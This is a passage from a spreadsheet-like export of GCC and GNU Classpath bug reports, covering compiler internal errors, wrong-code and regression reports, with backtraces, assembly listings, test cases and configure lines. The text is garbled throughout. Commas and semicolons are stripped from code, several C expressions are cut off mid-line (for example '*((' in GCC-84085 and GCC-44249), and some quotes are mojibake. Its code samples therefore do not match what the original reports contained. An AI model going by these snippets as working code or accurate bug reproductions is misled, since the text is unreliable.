    gimple_test_f=0x8123f6a8  fallback=0) at /home/andreas/patched/gcc-head/gcc/gimplify.c:7514
#10 0x00000000812474e8 in gimplify_stmt (stmt_p=0x3fff802a060 seq_p=0x3ffffffd7d0)
    at /home/andreas/patched/gcc-head/gcc/gimplify.c:5662
#11 0x000000008121f25e in gimplify_bind_expr (expr_p=0x3fff8019298 pre_p=0x3ffffffe7d8)
    at /home/andreas/patched/gcc-head/gcc/gimplify.c:1223
#12 0x0000000081257358 in gimplify_expr (expr_p=0x3fff8019298 pre_p=0x3ffffffe7d8 post_p=0x3ffffffdaf0 
    gimple_test_f=0x8123f6a8  fallback=0) at /home/andreas/patched/gcc-head/gcc/gimplify.c:7299
#13 0x00000000812474e8 in gimplify_stmt (stmt_p=0x3fff8019298 seq_p=0x3ffffffe7d8)
    at /home/andreas/patched/gcc-head/gcc/gimplify.c:5662
#14 0x000000008125e548 in gimplify_body (fndecl=0x3fff8019200 do_parms=1 '\001')
    at /home/andreas/patched/gcc-head/gcc/gimplify.c:8160
#15 0x000000008126070a in gimplify_function_tree (fndecl=0x3fff8019200)
    at /home/andreas/patched/gcc-head/gcc/gimplify.c:8294
#16 0x00000000809aabea in cgraph_analyze_function (node=0x3fff802b000)
    at /home/andreas/patched/gcc-head/gcc/cgraphunit.c:652
#17 0x00000000809ac59e in cgraph_analyze_functions () at /home/andreas/patched/gcc-head/gcc/cgraphunit.c:938
#18 0x00000000809b166e in finalize_compilation_unit () at /home/andreas/patched/gcc-head/gcc/cgraphunit.c:2086
#19 0x000000008011b6c2 in c_write_global_declarations () at /home/andreas/patched/gcc-head/gcc/c-decl.c:10112
#20 0x00000000821d8430 in compile_file () at /home/andreas/patched/gcc-head/gcc/toplev.c:568
#21 0x00000000821db150 in do_compile () at /home/andreas/patched/gcc-head/gcc/toplev.c:1872
#22 0x00000000821db35c in toplev_main (argc=4 argv=0x3fffffff2b8)
    at /home/andreas/patched/gcc-head/gcc/toplev.c:1948
#23 0x0000000084920768 in main (argc=4 argv=0x3fffffff2b8) at /home/andreas/patched/gcc-head/gcc/main.c:36</t>
  </si>
  <si>
    <t>GCC-59685</t>
  </si>
  <si>
    <t>ICE: in output_2305 at config/i386/sse.md:8919 with -march=bdver1 -mavx512f</t>
  </si>
  <si>
    <t>Created attachment 31573
reduced testcase
Compiler output:
$ gcc -march=bdver1 -mavx512f testcase.c            
testcase.c: In function 'foo':
testcase.c:7:1: internal compiler error: in output_2305 at config/i386/sse.md:8919
 }
 ^
0xfffaf3 output_2305
        /mnt/svn/gcc-trunk/gcc/config/i386/sse.md:8919
0x8702f5 final_scan_insn(rtx_def* _IO_FILE* int int int*)
        /mnt/svn/gcc-trunk/gcc/final.c:2929
0x8719e5 final(rtx_def* _IO_FILE* int)
        /mnt/svn/gcc-trunk/gcc/final.c:2024
0x871f0e rest_of_handle_final
        /mnt/svn/gcc-trunk/gcc/final.c:4438
0x871f0e execute
        /mnt/svn/gcc-trunk/gcc/final.c:4513
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                                
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-206332-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-206332-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.9.0 20140104 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-5488</t>
  </si>
  <si>
    <t>wrongcode when optimizing mmx asm inline</t>
  </si>
  <si>
    <t xml:space="preserve"> Submitter-Id:	net
 Originator:	Pierre Lombard
 Synopsis:	wrongcode when optimizing mmx asm inline
 Severity:	serious
 Priority:	medium
 Confidential:	no
 Category:	optimization
 Class:		wrong-code
 Release:	3.0.3 (Debian testing/unstable)
 Environment:
 System: Linux s41 2.4.17 #2 SMP Sat Dec 29 12:34:41 CET 2001 i686 unknown
 Architecture: i686
 host: i386-pc-linux-gnu
 build: i386-pc-linux-gnu
 target: i386-pc-linux-gnu
 configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-ge ttext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
 Description:
 I had already filed a bug report in July 2001 but there was neither follow-up
 nor reply.  It's archived here:
   http://gcc.gnu.org/ml/gcc-bugs/2001-07/msg00910.html.
 	With -O0 (correct code - ok with -O1 too):
 ...
         .section        .rodata
         .align 8
         .type   mm_wabs@object
         .size   mm_wabs8
 mm_wabs:
         .value  65535
         .value  65535
         .value  65535
         .value  65535
         .align 8
         .type   mm_wone@object
         .size   mm_wone8
 mm_wone:
         .value  1
         .value  1
         .value  1
         .value  1
         .text
         .align 4
         .type   dct_unquantize@function
 ...
 #APP
         movd    20(%ebp) %mm6
         punpckldq %mm6 %mm6
         movq    mm_wabs %mm4			//XXX
         movq    %mm6 %mm7
         movq    mm_wone %mm5			//XXX
         packssdw %mm6 %mm7
         pxor    %mm6 %mm6
         .p2align 2
 #NO_APP
 ...
 	With -O2 (and above =&gt; the same problem appears):
 .Lfe6:
         .size   draw_edges.Lfe6-draw_edges
         .section        .rodata
         .align 8
         .type   mm_wabs@object
         .size   mm_wabs8
 mm_wabs:
         .value  65535
         .value  65535
         .value  65535
         .value  65535
         .align 8
         .type   mm_wone@object
         .size   mm_wone8
 mm_wone:
         .value  1
         .value  1
         .value  1
         .value  1
         .align 2
 .LC113:
         .value  1
         .align 2
 .LC114:
         .value  65535
         .text
         .align 4
         .type   dct_unquantize@function
 ...
 #APP
         movd    %edi %mm6
         punpckldq %mm6 %mm6
         movq    .LC114 %mm4			// XXX
         movq    %mm6 %mm7
         movq    .LC113 %mm5			// XXX
         packssdw %mm6 %mm7
         pxor    %mm6 %mm6
 #NO_APP
 ...
 I still think mm4 and mm5 are not initialized to the same values -O0 and -O2
 with 3.0.3.  Can somebody confirm it's a bug (or explain me why it is not) ?
 How-To-Repeat:
 Just compile it with: gcc-3.0 -O[02] -S mpegvideo.i
 The preprocesses file has already been uploaded:
 	http://gcc.gnu.org/ml/gcc-bugs/2001-07/msg00910/mpegvideo.i.gz
 Fix:
 A workaround is to use a 64bits unsigned long long.
 Another one is to compile with -O0.
Release:
unknown</t>
  </si>
  <si>
    <t>pierre.lombard</t>
  </si>
  <si>
    <t>GCC-23615</t>
  </si>
  <si>
    <t>obj-c++.dg/method-19.mm fails with the GNU runtime on linux</t>
  </si>
  <si>
    <t>obj-c++.dg/method-19.mm fails with:
/home/pinskia/src/onetest/gcc/gcc/testsuite/obj-c++.dg/method-19.mm:19: error: declaration of 
'int strcmp(const char* const char*)' throws different exceptions
/usr/include/string.h:97: error: than previous declaration 'int strcmp(const char* const char*) throw ()'
We should just include string.h instead of declaring strcmp.</t>
  </si>
  <si>
    <t>CLASSPATH-27028</t>
  </si>
  <si>
    <t>Iterator.hasNext() throws ConcurrentModificationException</t>
  </si>
  <si>
    <t>While using the Eclipse update manager to install software it sometimes fails with a ConcurrentModificationException.  This seems to only happen some of the time but most often on the first attempt at installing Subclipse (ie. when it does the entire download verification etc.).  Here's how to install Subclipse:
http://subclipse.tigris.org/install.html</t>
  </si>
  <si>
    <t>GCC-31191</t>
  </si>
  <si>
    <t>[4.3 Regression] 1000% Runtime regression for FreeFEM navier-stokes example</t>
  </si>
  <si>
    <t>The regression was introduced between r120825 (10s runtime) and r120846 (110s runtime).  The obvious candidate is:
+2007-01-16  Jan Hubicka  
+
+       * cgraph.h (cgraph_decide_inlining_incrementally): Kill.
+       * tree-pass.h: Reorder to make IPA passes appear toegher.
+       (pass_early_inline pass_inline_parameters pass_apply_inline): Declare.+       * cgraphunit.c (cgraph_finalize_function): Do not compute inling
+       parameters do not call early inliner.
+       * ipa-inline.c: Update comments.  Include tree-flow.h
+       (cgraph_decide_inlining): Do not compute inlining parameters.
+       (cgraph_decide_inlining_incrementally): Return TODOs assume to
+       be called with function context set up.
+       (pass_ipa_inline): Remove unreachable functions before pass.
+       (cgraph_early_inlining): Simplify assuming to be called from the
+       PM as local pass.
+       (pass_early_inline): New pass.
+       (cgraph_gate_ipa_early_inlining): New gate.
+       (pass_ipa_early_inline): Turn into simple wrapper.
+       (compute_inline_parameters): New function.
+       (gate_inline_passes): New gate.
+       (pass_inline_parameters): New pass.
+       (apply_inline): Move here from tree-optimize.c
+       (pass_apply_inline): New pass.
+       * ipa.c (cgraph_remove_unreachable_nodes): Verify cgraph after
+       transforming.
+       * tree-inline.c (optimize_inline_calls): Return TODOs rather than
+       doing them by hand.
+       (tree_function_versioning): Do not allocate dummy struct function.
+       * tree-inline.h (optimize_inline_calls): Update prototype.
+       * tree-optimize.c (execute_fixup_cfg): Export.
+       (pass_fixup_cfg): Remove
+       (tree_rest_of_compilation): Do not apply inlines.
+       * tree-flow.h (execute_fixup_cfg): Declare.
+       * Makefile.in (gt-passes.c): New.
+       * passes.c: Include gt-passes.h
+       (init_optimization_passes): New passes.
+       (nnodes order): New static vars.
+       (do_per_function_toporder): New function.
+       (execute_one_pass): Dump current pass here.
+       (execute_ipa_pass_list): Don't dump current pass here.</t>
  </si>
  <si>
    <t>GCC-84085</t>
  </si>
  <si>
    <t>Array element is unnecessary loaded twice</t>
  </si>
  <si>
    <t>[code]
#define N 9
struct S1
{
    int a1[N][N]
}
struct S2
{
    int a2[N][N]
    int a3[N][N]
}
void test1(S1* s1 S2* s2)
{
    s2-&gt;a2[N-1][N-1] = s1-&gt;a1[N-1][N-1]
    s2-&gt;a3[N-1][N-1] = 1u a1[N-1][N-1]
}
void test2(S1* s1 S2* s2)
{
    const int n = N*N-1
    *((
    *((
}
void test3(S1* s1 S2* s2)
{
    const int n = N*N-1
    int x = *(
    *((
    *((
}
[/code]
[out]
test1(S1* S2*):
  mov ecx DWORD PTR [rdi+320]
  mov eax 1
  sal eax cl
  mov DWORD PTR [rsi+320] ecx
  mov DWORD PTR [rsi+644] eax
  ret
test2(S1* S2*):
  mov eax DWORD PTR [rdi+320]
  mov DWORD PTR [rsi+320] eax
  mov ecx DWORD PTR [rdi+320]
  mov eax 1
  sal eax cl
  mov DWORD PTR [rsi+644] eax
  ret
test3(S1* S2*):
  mov ecx DWORD PTR [rdi+320]
  mov eax 1
  sal eax cl
  mov DWORD PTR [rsi+320] ecx
  mov DWORD PTR [rsi+644] eax
  ret
[/out]
All 3 functions are equivalent. However when 2D array is treated as a 1D one gcc for some reason loads array element twice (function test2). Local variable added in test3 allows to get the same code as for test1. I have found this during writing code for AARCH64 but x86_64 is also affected.
gcc 8 (trunk) does not have this problem.</t>
  </si>
  <si>
    <t>GCC-48262</t>
  </si>
  <si>
    <t>[4.7 Regression] Subversion id 171341 breaks various vectorization files on powerpc</t>
  </si>
  <si>
    <t>Created attachment 23763
-save-temps of a file that shows the bug (compile with -O3 -m64 -mvsx)
I updated GCC to the head release and tried to build spec on power7 and I had a lot of failures.  I also got failures in one of my vectorization tests.
The failures are in:
oo2.c: In function â€˜trunkp7vsx_align_amove_0_0_sign_longâ€™:
foo2.c:120:36: internal compiler error: in expand_insn at optabs.c:7171
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
GNU gdb (GDB) SUSE (7.0-0.4.16)
Copyright (C) 2009 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as ppc64-suse-linux.
For bug reporting instructions please see:
...
Reading symbols from /home/meissner/fsf-build-ppc64/power7-meissner/gcc/cc1...done.
Breakpoint 1 at 0x1020460c: file /home/meissner/fsf-src/power7-meissner/gcc/diagnostic.c line 893.
Breakpoint 2 at 0x102052c4: file /home/meissner/fsf-src/power7-meissner/gcc/diagnostic.c line 838.
Breakpoint 3 at 0x109e7f94
Breakpoint 4 at 0x109e7884
(gdb) r -O3 -m64 -mvsx foo2.i
Starting program: /home/meissner/fsf-build-ppc64/power7-meissner/gcc/cc1 -O3 -m64 -mvsx foo2.i
Missing separate debuginfo for /usr/lib64/libstdc++.so.6
Try: zypper install -C debuginfo(build-id)=ed25a9207e96ab232788f89131590142a443bca0
Missing separate debuginfo for /lib64/libgcc_s.so.1
Try: zypper install -C debuginfo(build-id)=3a099294fce09d9fce7bf2a37e64588381d3c56d
 atof atoi atol atoll gnu_dev_major gnu_dev_minor gnu_dev_makedev vprintf getchar fgetc_unlocked getc_unlocked getchar_unlocked putchar fputc_unlocked putc_unlocked putchar_unlocked feof_unlocked ferror_unlocked trunkp7vsx_align_amove_0_0_sign_long
Analyzing compilation unit
Performing interprocedural optimizations
          Assembling functions:
 trunkp7vsx_align_amove_0_0_sign_long
Breakpoint 1 fancy_abort (file=0x10a30f18 /home/meissner/fsf-src/power7-meissner/gcc/optabs.c line=7171 function=0x10a30e60 expand_insn) at /home/meissner/fsf-src/power7-meissner/gcc/diagnostic.c:893
893       internal_error (in %s at %s:%d function trim_filename (file) line)
(gdb) up
#1  0x00000000103c2e6c in expand_insn (icode= nops= ops=) at /home/meissner/fsf-src/power7-meissner/gcc/optabs.c:7171
7171        gcc_unreachable ()
(gdb) up
#2  expand_insn (icode= nops= ops=) at /home/meissner/fsf-src/power7-meissner/gcc/optabs.c:7167
7167    expand_insn (enum insn_code icode unsigned int nops
(gdb) up
#3  0x00000000102864f4 in expand_assignment (nontemporal= from=Unhandled dwarf expression opcode 0xf3
) at /home/meissner/fsf-src/power7-meissner/gcc/expr.c:4184
4184          expand_insn (icode 2 ops)
(gdb) up
#4  expand_assignment (nontemporal= from=Unhandled dwarf expression opcode 0xf3
) at /home/meissner/fsf-src/power7-meissner/gcc/expr.c:4108
4108    expand_assignment (tree to tree from bool nontemporal)
(gdb) print to
$1 = (union tree_node *) 0xfffb63bc5d0
(gdb) pt
 &lt;target_mem_ref 0xfffb63bc5d0
    type &lt;vector_type 0xfffb6409c30
        type &lt;integer_type 0xfffb62405e8 long int public DI
            size 
            unit size 
            align 64 symtab 0 alias set 2 canonical type 0xfffb62405e8 precision 64 min  max  context 
            pointer_to_this &gt;
        V2DI
        size 
        unit size 
        align 64 symtab 0 alias set 2 canonical type 0xfffb6409648 nunits 2
        pointer_to_this &gt;
    arg 0 &lt;ssa_name 0xfffb6393700
        type 
            public unsigned restrict DI size  unit size 
            align 64 symtab 0 alias set -1 canonical type 0xfffb6409b88&gt;
        visited var def_stmt vect_p.29_94 = vec1_15 + base_off.22_85
        version 94
        ptr-info 0xfffb61db160&gt;
    arg 1  constant 0&gt;
    arg 2 &lt;ssa_name 0xfffb6392520
        type  unit size 
            align 64 symtab 0 alias set -1 canonical type 0xfffb6240000 precision 64 min  max &gt;
        visited var def_stmt ivtmp.122_61 = PHI 
        version 61&gt;&gt;
(gdb) print from
Unhandled dwarf expression opcode 0xf3
(gdb) pt
 &lt;target_mem_ref 0xfffb63bc5d0
    type &lt;vector_type 0xfffb6409c30
        type &lt;integer_type 0xfffb62405e8 long int public DI
            size 
            unit size 
            align 64 symtab 0 alias set 2 canonical type 0xfffb62405e8 precision 64 min  max  context 
            pointer_to_this &gt;
        V2DI
        size 
        unit size 
        align 64 symtab 0 alias set 2 canonical type 0xfffb6409648 nunits 2
        pointer_to_this &gt;
    arg 0 &lt;ssa_name 0xfffb6393700
        type 
            public unsigned restrict DI size  unit size 
            align 64 symtab 0 alias set -1 canonical type 0xfffb6409b88&gt;
        visited var def_stmt vect_p.29_94 = vec1_15 + base_off.22_85
        version 94
        ptr-info 0xfffb61db160&gt;
    arg 1  constant 0&gt;
    arg 2 &lt;ssa_name 0xfffb6392520
        type  unit size 
            align 64 symtab 0 alias set -1 canonical type 0xfffb6240000 precision 64 min  max &gt;
        visited var def_stmt ivtmp.122_61 = PHI 
        version 61&gt;&gt;
(gdb)</t>
  </si>
  <si>
    <t>GCC-44249</t>
  </si>
  <si>
    <t>[4.7 Regression] IRA generates extra register move</t>
  </si>
  <si>
    <t>From PR 34653 for
---
extern unsigned long table[]
unsigned long foo(unsigned char *p) {
  unsigned long tag = *p
  return table[tag &gt;&gt; 4] + table[tag 
}
---
at -O2 IRA generates an extra register move:
gcc-4.3 with -O2 generates:
foo:
        movzbl  (%rdi) %edx
        movq    %rdx %rax
        shrq    $4 %rdx
        andl    $15 %eax
        movq    table(%rax8) %rax
        addq    table(%rdx8) %rax
        ret
And gcc-4.4+ -O2 generates:
foo:
        movzbl  (%rdi) %eax
        movq    %rax %rcx
&gt;&gt;	movq	%rax %rdx
        andl    $15 %ecx
        shrq    $4 %rdx
        movq    table(%rcx8) %rax
        addq    table(%rdx8) %rax
        ret
Please note extra move.</t>
  </si>
  <si>
    <t>GCC-5493</t>
  </si>
  <si>
    <t>G++ 3.0.2 segmentation fault</t>
  </si>
  <si>
    <t>g++ have an internal error leading to segmentation fault.
The command line which produced the error :
g++ -c -g3 -ggdb -W -Wall -frepo -DOTA_DEBUG -I./  -I/usr/local/include -I/usr/local/mysql/include tes tage.c++
The error :
In file included from ESmsV2Crypto.h:5
                 from testage.c++:36:
BinaryArray.h: In constructor `BinaryArray::BinaryArray()':
BinaryArray.h:71: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
A full-preprocessed source is attached to this bug report.
Command line used to obtain the preprocessed source :
g++ -v -save-temps -E -g3 -ggdb -W -Wall -frepo -DOTA_DEBUG -I./  -I/usr/local/include -I/usr/local/my sql/include testage.c++ &gt; preprocessed.source.ii
The output of this command (gcc infos) :
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.0.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --enable-long-long --enable-cstdio=stdio --enable-clocale=generic --enable-languages=cc++f77objcjava --program-suffix=-3.0.2 --enable-objc-gc --host=i586-mandrake-linux-gnu
Thread model: posix
gcc version 3.0.2
GNU CPP version 3.0.2 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i586-mandrake-linux-gnu/include
ignoring duplicate directory /usr/local/include
#include ... search starts here:
#include  search starts here:
 .
 /usr/local/include
 /usr/local/mysql/include
 /usr/include/g++-v3
 /usr/include/g++-v3/i586-mandrake-linux-gnu
 /usr/include/g++-v3/backward
 /usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.0.2/include
 /usr/include
End of search list.
Release:
gcc3.0.2
Environment:
Linux 2.4.3-20mdk Mandrake 8.0 i686
How-To-Repeat:
g++ -c preprocessed.source.ii
with the provided preprocessed source code</t>
  </si>
  <si>
    <t>mathieu.despriee</t>
  </si>
  <si>
    <t>GCC-2553</t>
  </si>
  <si>
    <t>[PATCH] other/2551: Successful g++ testsuite executables not dele</t>
  </si>
  <si>
    <t xml:space="preserve"> This patch fixes PR other/2551: Successful g++ testsuite executables not
 deleted on cygwin 
 The problem is that g++ testsuite executables generated by old-dejagnu.exp
 are never deleted so several hundred megabyts of unwanted files remain
 after each tetssuite run.
 Root cause is that the executable names do not have a suffix so cygwin adds
 .exe.  This patch adds suffix of .x
 2001-04-15  David Billinghurst 
 	* lib/old-dejagnu.exp:  add suffix .x to executable filenames
 +++++++++++++++++++++++++++++++++++++++++
 (Mr) David Billinghurst
 Comalco Research Centre
 PO Box 316 Thomastown Vic Australia 3074
 Phone:	+61 3 9469 0642
 FAX:	+61 3 9462 2700
 Email:	David.Billinghurst@riotinto.com
 Index: old-dejagnu.exp
 ===================================================================
 RCS file: /cvs/gcc/egcs/gcc/testsuite/lib/old-dejagnu.expv
 retrieving revision 1.22
 diff -u -r1.22 old-dejagnu.exp
 --- old-dejagnu.exp	2001/02/08 02:29:38	1.22
 +++ old-dejagnu.exp	2001/04/14 14:07:08
 @@ -2337 +2337 @@
      lappend cflags compiler=$compiler
      regsub -all \[./\] $name - output
 -    set output $tmpdir/$output
 +    set output $tmpdir/$output.x
      set compile_type executable
      set tmp [lindex [grep $prog Build don.t link:] 0]
Release:
unknown
Unformatted:
 	ted on cygwin</t>
  </si>
  <si>
    <t>GCC-57517</t>
  </si>
  <si>
    <t>[4.7 Regression] internal compiler error: in eliminate_temp_copies at tree-predcom.c:1913</t>
  </si>
  <si>
    <t>The following code compiles at O2 but not O3.
~/test &gt; gfortran481 -O3 -c module_diffusion_em.f90
module_diffusion_em.f90: In function â€˜cal_helicityâ€™:
module_diffusion_em.f90:1:0: internal compiler error: in eliminate_temp_copies at tree-predcom.c:1913
 SUBROUTINE cal_helicity (uh ph phb ht ims ime jms jme kms kme  &amp;
 ^
0xc81b7a eliminate_temp_copies
	../../gcc-4.8.1/gcc/tree-predcom.c:1913
0xc81b7a tree_predictive_commoning_loop
	../../gcc-4.8.1/gcc/tree-predcom.c:2519
0xc82277 tree_predictive_commoning()
	../../gcc-4.8.1/gcc/tree-predcom.c:2554
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
~/test &gt; cat module_diffusion_em.f90
SUBROUTINE cal_helicity (uh ph phb ht ims ime jms jme kms kme  &amp;
     its ite jts jte kts kte)
  INTEGER INTENT( IN ) :: ims ime jms jme kms kme  &amp;
       its ite jts jte kts kte
  REAL DIMENSION( ims:ime  jms:jme ) INTENT( IN ) :: ht
  REAL DIMENSION( ims:ime kms:kme jms:jme ) INTENT( IN ) :: ph phb
  REAL DIMENSION( ims:ime jms:jme ) INTENT( INOUT ) :: uh
  INTEGER :: i j k ktf i_start i_end j_start j_end
  REAL :: zl zu
  REAL DIMENSION( its-2:ite+2 kts:kte jts-2:jte+2 ) :: wavg rvort
  real parameter :: g = 9.81
  DO j = j_start j_end
     DO k = kts ktf
        DO i = i_start i_end
           zu =  (( ph(i k+1j ) + phb(i k+1j ) ) / g - ht(i j ) ) + &amp;
                (( ph(i-1k+1j ) + phb(i-1k+1j ) ) / g - ht(i-1j ) ) + &amp;
                (( ph(i k+1j-1) + phb(i k+1j-1) ) / g - ht(i j-1) )
           IF ( zl .GE. 2000. .AND. zu .LE. 5000. ) THEN
              IF ( wavg(ikj) .GT. 0. .AND. wavg(ik+1j) .GT. 0. ) THEN
                 uh(ij) = uh(ij) + ( wavg(ikj) * rvort(ikj) + &amp;
                      wavg(ik+1j) * rvort(ik+1j) )  * ( zu - zl )
              ENDIF
           ENDIF
        END DO
     END DO
  END DO
END SUBROUTINE cal_helicity
~/test &gt; gfortran481 -v
Using built-in specs.
COLLECT_GCC=/home/decker/local/gcc481/bin/gfortran481
COLLECT_LTO_WRAPPER=/home/decker/local/gcc481/libexec/gcc/x86_64-unknown-linux-gnu/4.8.1/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.8.1/configure --prefix=/home/decker/local/gcc481 --program-suffix=481 --enable-languages=cc++fortran --with-gmp=/home/decker/local --with-mpfr=/home/decker/local --with-mpc=/home/decker/local --with-isl=/home/decker/local --with-cloog=/home/decker/local
Thread model: posix
gcc version 4.8.1 (GCC)</t>
  </si>
  <si>
    <t>decker</t>
  </si>
  <si>
    <t>GCC-54653</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] tsubst_template_parms ICE</t>
  </si>
  <si>
    <t>union A {}
struct B
{
  template  struct C {}
}
template  class D = B::template C&gt;
struct E
template  class D&gt;
struct E 
{
  void (*f) (A 
  template  class J&gt;
  struct G { static void d (A  }
  template  inline E (H &amp;fn)
  {
    f = 
  }
}
template  class D&gt;
struct E ::G 
{
}
struct Z { int z }
int
main ()
{
  Z t = {}
  E  f (t)
}
ICEs in tsubst_template_parms because parms is NULL.  The ICE started in between r128000 and r128500.</t>
  </si>
  <si>
    <t>GCC-24919</t>
  </si>
  <si>
    <t>[4.0] CRLF support in libgfortran</t>
  </si>
  <si>
    <t>When reading a dos file gfortran returns two records for each line
in the file: the real record and a null one. In other words it is treating
the carriage return as a newline instead of the pair carriage return/newline
as the newline.
Here is an example:
      integer ios
      character buf*(50)
c
      open(10file='dos'iostat=ios)
      print *' open ios 'ios
 1000 read(10'(a)'iostat=ios) buf
      if(ios .ne.0) go to 9000
      print '(aaa)'' read '
      go to 1000
c
 9000 end</t>
  </si>
  <si>
    <t>GCC-45695</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] -O1 wrong-code by cmove</t>
  </si>
  <si>
    <t>FSF GDB HEAD by FSF GCC 4.5.HEAD errors on `print 0|0' with -O1 and higher.
source below compiles to:
0000000000400455 :
  400455:       53                      push   %rbx
  400456:       39 fa                   cmp    %edi%edx
  400458:       0f 44 de                cmove  %esi%ebx
but $ebx is left uninitialized for not-equal comparison.
Compilation flags: -O1
it passes = exit code 0 = with -O0
it fails  = exit code 1 = with -O1
PASS: gcc (GCC) 4.4.5 20100916 (prerelease)
FAIL: gcc (GCC) 4.5.2 20100916 (prerelease)
PASS: gcc (GCC) 4.6.0 20100916 (experimental)
FAIL: gcc-4.5.1-3.fc14.x86_64
not re-verified but PASS: gcc-4.5.1-1.fc14.x86_64
__attribute__((noinline noclone)) void
g (int x)
{ 
  asm volatile ()
}
__attribute__((noinline noclone)) int
f (int a int b int d)
{
  int r = -1
  b += d
  if (d == a)
    r = b - d
  g (b)
  return r 
}
int 
main (void)
{ 
  asm volatile (mov $42 %%rbx : : : rbx)
  return f (0 1 4) == 42 ? 1 : 0
}</t>
  </si>
  <si>
    <t>GCC-31928</t>
  </si>
  <si>
    <t>Libjava testsuite not setting test environment parameters correctly.</t>
  </si>
  <si>
    <t>I compiled gcc with java as one of the languages --enable-languages=...java...
$xgcc -v
Using built-in specs.
Target: i686-pc-cygwin
Configured with: /cygdrive/C/makecygwin/gcc-4_2-branch/configure --verbose --enable-languages=cadac++fortranjavaobjcobj-c++ --with-tune=athlon-xp --prefix=/usr --enable-objc-gc --enable-concept-checks --disable-multilib --exec-prefix=/usr --sysconfdir=/etc --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/4.2 --enable-libstdcxx-debug --enable-static --enable-shared --enable-initfini-array --enable-__cxa_atexit --enable-threads=posix --enable-version-specific-runtime-libs --enable-libssp --enable-libmudflap --enable-libgomp --disable-werror --enable-nls --without-included-gettext --enable-decimal-float --with-long-double-128 --enable-debug --enable-java-gc=boehm --with-x --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --enable-java-awt=gtkxlib --enable-gtk-cairo --enable-qt-peer --enable-xmlj --enable-gconf-peer --enable-tool-wrappers --enable-portable-native-sync --enable-libgcj-multifile --enable-libgcj --with-stabs --enable-hash-synchronization --enable-gc-debug --enable-interpreter --with-system-zlib --enable-libada --with-tls --enable-win32-registry --with-cpu=athlon-xp --with-arch=athlon-xp --disable-checking
Thread model: posix
gcc version 4.2.0 20070508 (prerelease)
Cygwin:
$ runtest --version
Expect version is       5.26
Tcl version is          8.4
Framework version is    1.4.2.x
Linux:
# runtest --version
Expect version is       5.43.0
Tcl version is          8.4
Framework version is    1.4.99
When I build this on the i686-pc-linux-gnu target the begining of the libjava.log looks like this:
Running target unix
Using /usr/share/dejagnu/baseboards/unix.exp as board description file for target.
Using /usr/share/dejagnu/config/unix.exp as generic interface file for target.
Using /root/downloads/gcc-4_2-branch/libjava/testsuite/config/default.exp as tool-and-target-specific interface file.
Running /root/downloads/gcc-4_2-branch/libjava/testsuite/libjava.cni/cni.exp ...
byte compile: /opt/gcc-4_2-build/gcc/gcj -B/opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/ -B/opt/gcc-4_2-build/gcc/ --encoding=UTF-8 -C -I/opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/testsuite/../libgcj-4.2.0.jar -g /root/downloads/gcc-4_2-branch/libjava/testsuite/libjava.cni/PR9577.java -d /opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/testsuite 2&gt;@ stdout
PASS: bytecompile /root/downloads/gcc-4_2-branch/libjava/testsuite/libjava.cni/PR9577.java
PR9577 PASS: PR9577 header generation
Executing on host: /opt/gcc-4_2-build/gcc/xgcc -B/opt/gcc-4_2-build/gcc/  -I. -I.. -I/root/downloads/gcc-4_2-branch/libjava/testsuite/.. -c  -o natPR9577.o /root/downloads/gcc-4_2-branch/libjava/testsuite/libjava.cni/natPR9577.cc    (timeout = 300)
PASS: natPR9577.cc compilation
set_ld_library_path_env_vars: ld_library_path=.:/opt/gcc-4_2-build/i686-pc-linux-gnu/./libjava/.libs:/opt/gcc-4_2-build/gcc
Executing on host: /opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/testsuite/../libtool --silent --tag=GCJ --mode=link /opt/gcc-4_2-build/gcc/gcj -B/opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/ -B/opt/gcc-4_2-build/gcc/ --encoding=UTF-8 -B/opt/gcc-4_2-build/i686-pc-linux-gnu/libjava/testsuite/../ /root/downloads/gcc-4_2-branch/libjava/testsuite/libjava.cni/PR9577.java natPR9577.o   -no-install --main=PR9577 -g  -L/opt/gcc-4_2-build/i686-pc-linux-gnu/./libjava/.libs -lm   -o PR9577    (timeout = 300)
PASS: linking PR9577
set_ld_library_path_env_vars: ld_library_path=.:/opt/gcc-4_2-build/i686-pc-linux-gnu/./libjava/.libs:/opt/gcc-4_2-build/gcc
